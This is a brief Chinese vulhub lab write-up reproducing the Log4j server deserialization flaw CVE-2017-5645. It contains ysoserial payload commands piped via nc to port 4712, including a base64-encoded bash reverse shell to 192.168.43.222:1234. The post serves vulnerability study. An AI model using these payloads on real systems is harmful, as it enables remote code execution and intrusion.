vulhub漏洞复现- Log4j(CVE-2017-5645)Apache Log4j Server 反序列化命令执行漏洞

Apache Log4j Server

Apache Log4j是一个用于Java的日志记录库,其支持启动远程日志服务器,能够控制日志的输出格式与目的地。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用该漏洞执行任意代码

思路

利用ysoserial生成payload,然后直接发送给your-ip:4712端口即可

漏洞复现

把ysoserial.jar文件放到网盘里
百度网盘密码:613a

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "touch /tmp/test" | nc vulhub.yster.live 4712

在这里插入图片描述
虽然出现里奇怪的报错但还是成功执行了,也可以尝试nc

bash base64加密
vulhub漏洞复现- Log4j(CVE-2017-5645)Apache Log4j Server 反序列化命令执行漏洞_第1张图片

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjQzLjIyMi8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" | nc vulhub.yster.live 4712

你可能感兴趣的:(vulhub,vulhub)